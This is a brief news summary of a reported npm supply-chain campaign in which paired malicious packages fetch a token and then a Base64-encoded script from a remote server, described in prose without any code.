"New Ongoing Campaign Targets npm Ecosystem with Unique Execution Chain"

Cybersecurity researchers have uncovered a new ongoing campaign targeting the npm ecosystem that involves a unique execution chain to deliver an unknown payload to victim systems. According to the software supply chain security company Phylum, the packages in question appear to be published in pairs, with each pair working to retrieve additional resources that are then decoded and/or executed. As the first of the two modules is designed to store locally a token retrieved from a remote server, the order in which the packages are installed is crucial for executing a successful attack. The second package sends this token along with the operating system type as a parameter to an HTTP GET request in order to retrieve a second script from the remote server. A successful execution returns a Base64-encoded string that is executed immediately, but only if the returned string is longer than 100 characters. This article continues to discuss the new ongoing campaign aimed at the npm ecosystem.

THN reports "New Ongoing Campaign Targets npm Ecosystem with Unique Execution Chain"